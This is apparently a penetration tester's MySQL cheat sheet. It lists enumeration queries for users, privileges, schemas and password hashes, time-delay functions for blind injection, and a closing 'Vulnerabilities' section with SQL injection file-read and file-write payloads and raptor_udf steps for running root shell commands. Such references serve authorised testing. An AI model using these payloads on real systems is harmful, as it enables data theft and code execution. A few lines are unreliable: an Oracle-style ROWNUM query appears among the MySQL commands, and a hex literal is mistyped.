MySQL

Database commands

Comments

SELECT 1; #comment
SELECT /*comment*/1;

Version

SELECT @@version

Users

SELECT user();
SELECT system_user();
SELECT user FROM mysql.user; -- priv
CREATE USER <name> IDENTIFIED BY '<pass>'; 
DROP USER <name>; 
GRANT ALL PRIVILEGES ON *.* TO <name>@'%';
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

Database info

SELECT database()
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db;
SELECT @@datadir;

List tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Filter table by column name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘’;

Access nth row

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=<nth>;

String operations

SELECT substr('<string>', <start>, <end>); # returns c
SELECT char(65); # returns A
SELECT ascii('A'); # returns 65
SELECT 0×414243; # returns ABC
Casting	SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT CONCAT('A','B','C');

Conditional execution

SELECT if(1=1,'foo','bar');
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;

Time delay

SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(<seconds>); # >= 5.0.12

Hostname

SELECT @@hostname;

Passwords

SELECT host, user, password FROM mysql.user; --priv

Format: SQL

Vulnerabilities

Arbitrary file access

…' UNION ALL SELECT LOAD_FILE('<readable file>');    #SQLi

Arbitrary file write

SELECT * FROM mytable INTO <name> '<path to name>';
UNION SELECT ("<payload>") INTO OUTFILE '<path> '  -- -'

Local code execution (raptor_udf)

Useful if the database is run with root privileges and you know the credentials. Get payload from https://www.exploit-db.com/exploits/1518 compile and transfer it to target machine.

Login with root credentials mysql -u root -p <pass>
Find plugin directory select @@plugin_dir;
Load payload in memoryuse mysql;create table foo(line blob);insert into foo values(load_file('<path to payload>'));
Write payload in plugin folder select * from foo into dumpfile '<plugin folder>/raptor_udf2.so';
Create a function to invoke the payload create function do_system returns integer soname 'raptor_udf2.so';
Execute commands as root select do_system("<bash command>");

PreviousMSSQL NextLogin

Last updated 2 years ago

hashtagDatabase commands

hashtagComments

hashtagVersion

hashtagUsers

hashtagPrivileges

hashtagDatabase info

hashtagList tables

hashtagList columns

hashtagFilter table by column name

hashtagAccess nth row

hashtagString operations

hashtagConditional execution

hashtagTime delay

hashtagHostname

hashtagPasswords

hashtagVulnerabilities

hashtagArbitrary file access

hashtagArbitrary file write

hashtagLocal code execution (raptor_udf)